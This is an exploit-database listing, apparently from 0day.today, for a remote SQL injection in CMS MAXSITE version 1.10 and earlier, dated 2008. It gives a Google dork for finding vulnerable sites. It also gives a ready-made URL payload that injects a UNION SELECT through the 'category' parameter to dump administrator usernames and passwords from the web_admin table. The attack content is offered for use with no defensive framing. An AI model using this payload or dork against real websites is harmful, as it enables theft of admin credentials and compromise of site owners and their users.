[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CMS MAXSITE <= 1.10 (category) Remote SQL Injection Vulnerability

Author
Tesz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3071
Category
web applications
Date add
25-05-2008
Platform
unsorted
=================================================================
CMS MAXSITE <= 1.10 (category) Remote SQL Injection Vulnerability
=================================================================



[+] Author: Tesz 
[+] Home: http://www.thaishadow.com
[+] Forum: http://www.thaishadow.com/board/index.php

[+] Download: http://maxsite.geniuscyber.com/index.php?name=index

[+] Dork: MAXSITE or intitle:"MAXSITE"

[+] Exploit: http://server.com/path/index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/*

[+] index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/*




#  0day.today [2024-10-06]  #